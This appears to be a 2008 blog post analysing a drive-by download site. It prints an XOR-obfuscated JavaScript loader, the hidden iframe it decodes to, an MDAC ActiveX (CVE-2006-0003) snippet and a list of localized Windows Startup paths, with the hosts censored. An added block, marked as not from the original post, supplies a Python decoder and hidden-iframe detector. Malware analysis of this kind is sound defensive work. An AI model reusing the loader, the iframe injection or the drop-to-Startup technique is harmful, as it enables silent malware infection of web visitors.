Best_Pool Exploit and Malware WebSite

April 12, 2008

Hi,

Yesterday, while browsing some of the strangest websites flagged in a forum, I discovered that one of them hosts an exploit plus malware.

The Website is Best_Pool.

I immediately inspected it with Malzilla, and a telling piece of JS was loaded:

<script>
var data=unescape("%7B%14%04%15%0E%17%13g%2B%26%29%202%26%20%22ze%0D%261%26%14%245.73eyg%23%28%242%2A%22%293i05.3%22o%60%7B.%215%26%2A%22g45%24ze%2F337%7Dhh1.7%264%283%2C%26i%24%28%2Ah.%29i7%2F7x%26%231zrwsva1%26%2Bzspq%25s%24%7F%26eg43%3E%2B%22ze%23.47%2B%26%3E%7D%29%28%29%22ey%7Bh.%215%26%2A%22y%60n%7Cg%7Bh%14%04%15%0E%17%13y");
var dec="";
for(idx=0;idx<data.length;idx++){dec+=String.fromCharCode(data.charCodeAt(idx)^71);}
document.write(unescape(dec));
</script>

Clearly obfuscated, but in two easy steps I decoded it:

<SCRIPT language="JavaScript">
document.write('<iframe src="http://{CENSORED}c8a"
style="display:none"></iframe>');
</SCRIPT>
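To make the two-step decoding above repeatable, here is an added Python example (not code from the original post): it replays the loader's unescape-then-XOR-71 loop, brute-forces the single-byte key when it is not visible in the loader, and lists any iframes hidden with display:none. The sample input is constructed by re-encoding the decoded script above (URL still censored) with the same key, so it has the shape of the loader's unescape() argument.

```python
import re
from typing import List, Optional

# Mimic JS unescape(): %uXXXX -> U+XXXX, %XX -> U+00XX, everything else unchanged.
_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
_IFRAME = re.compile(r"<iframe\b([^>]*)>", re.I)
_SRC = re.compile(r"""src\s*=\s*["']([^"']+)["']""", re.I)

def js_unescape(s: str) -> str:
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def xor_decode(data: str, key: int = 71) -> str:
    """Replay the loader's loop: unescape, then XOR every char code with the key."""
    return "".join(chr(ord(c) ^ key) for c in js_unescape(data))

def xor_encode(plain: str, key: int = 71) -> str:
    """Inverse of xor_decode; used here only to build a sample in the loader's format."""
    return "".join("%%%02X" % (ord(c) ^ key) for c in plain)

def recover_key(data: str) -> Optional[int]:
    """When the key is not visible in the loader, brute-force the single byte:
    accept the first key whose output starts with '<' and is entirely printable."""
    raw = js_unescape(data)
    for key in range(256):
        out = "".join(chr(ord(c) ^ key) for c in raw)
        if out.startswith("<") and all(c.isprintable() or c in "\r\n\t" for c in out):
            return key
    return None

def find_hidden_iframes(html: str) -> List[str]:
    """Return the src of every <iframe> whose inline style hides it (display:none)."""
    hits = []
    for tag in _IFRAME.finditer(html):
        attrs = tag.group(1)
        if re.search(r"display\s*:\s*none", attrs, re.I):
            src = _SRC.search(attrs)
            if src:
                hits.append(src.group(1))
    return hits

# Constructed sample: the decoded script from the post (URL kept censored),
# re-encoded with the same key so it looks like the loader's unescape() argument.
SAMPLE_DECODED = (
    '<SCRIPT language="JavaScript">\n'
    'document.write(\'<iframe src="http://{CENSORED}c8a" style="display:none"></iframe>\');\n'
    "</SCRIPT>"
)
SAMPLE_DATA = xor_encode(SAMPLE_DECODED)

if __name__ == "__main__":
    key = recover_key(SAMPLE_DATA)
    print("key:", key)
    print(xor_decode(SAMPLE_DATA, key))
    print("hidden iframes:", find_hidden_iframes(xor_decode(SAMPLE_DATA, key)))
```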

A classic iframe infection, so let's check what happens at http://{CENSORED}c8a.
Malzilla detects a redirection to http://{CENSORED}/in.php?adv=5041&val=476b4c8a, a page
that contains a big obfuscated JavaScript.

This JS contains three functions:

zhhrgjuf(n)
oafvme(a)
rkgganati(str)

and a big piece of encoded data. This too can be decoded easily, and what appears is an
HTML page that contains yet another JS.

Let's analyse that JS:

It implements a function lsrn(lev3par1), inside which we immediately notice a link to an
executable: http://{CENSORED}/adw_files/5041/175c7663/install.exe?id=1
Another variable contains:

var obj_WScript=objmker(lev3par1,"WScript.Shell")

hdrive+"\\Documents and Settings\\All Users\\Menu Inicio\\Programas\\Inicio"+exes
hdrive+"\\Documents and Settings\\All Users\\Menuen Start\\Programmer\\Start"+exes
hdrive+"\\Documents and Settings\\All Users\\Menu Start\\Programma's\\Opstarten"+exes
hdrive+"\\Documents and Settings\\All Users\\Menu Start\\Programy\\Autostart"+exes
hdrive+"\\Documents and Settings\\All Users\\Menu Avvio\\Programmi\\Esecuzione automatica"+exes
hdrive+"\\Documents and Settings\\All Users\\Kaynnista-valikko\\Ohjelmat\\Kaynnistys"+exes
hdrive+"\\Documents and Settings\\All Users\\Start Menu\\Programlar\\BASLANGIC"+exes
hdrive+"\\Documents and Settings\\All Users\\Start-meny\\Programmer\\Oppstart"+exes
hdrive+"\\Documents and Settings\\All Users\\Start-menyn\\Program\\Autostart"+exes
hdrive+"\\Documents and Settings\\All Users\\Menu Iniciar\\Programas\\Iniciar"+exes
hdrive+"\\Dokumente und Einstellungen\\All Users\\Startmenu\\Programme\\Autostart"+exes
hdrive+"\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup"+exes

To cover as many users as possible, the JS builds these Startup paths for the various localized versions of Windows.
Now we can see an interesting piece of code, with a CLSID:

var obj2mk="testobj"+".innerHTML"+"=testobj"+
".innerHTML"+"+\"<object"+" classid"+"='clsid:"
+"527196a4-b1a3-4647-931d-37ba5af23037"+"' codebase="+"'\"+fnex+\"'></"+"object>\";";

First of all, let's look up this CLSID: we find that it refers to the MDAC ActiveX
code execution vulnerability (CVE-2006-0003). From the advisory:

An attacker who successfully exploited this vulnerability could gain the same user rights
as the local user. Users whose accounts are configured to have fewer user rights on the
system could be less impacted than users who operate with administrative user rights.

It's clear now!
The malicious executable install.exe is downloaded and dropped into the Startup (Autostart) folder.

The next step is to download and study this executable. Here are some characteristics of this malware:

--------
File size: 67584 bytes
MD5: 1a7baafd0d2c53c1e711a940fe6fdbeb
SHA1: a3426c0322ca1de1b83d0f5d6d1ce7366ce30f39
SHA256: e44f9e28c6810a48ca5e3b13f1585e82d37f21eed5fe88ac688f915a863d82f1
SHA512: 36f48a1a71e624dc4219a857df7ea41c7b9dd4180a78870ff6f7a78c9d2c82315f25cbd34db102c630b973363e211a6c0b5ac223baa2fb0fe36c3060fddd7416
--------

AntiVir        2008.04.11   HEUR/Crypted
CAT-QuickHeal  2008.04.10   (Suspicious) - DNAScan
F-Secure       2008.04.11   Suspicious:W32/Malware!Gemini
eSafe          2008.04.09   Suspicious File
Microsoft      2008.04.11   Trojan:Win32/Tibs.gen!H
Sophos         2008.04.11   Troj/Dorf-BB

No other antivirus engine detects it!

See you in the next post :)
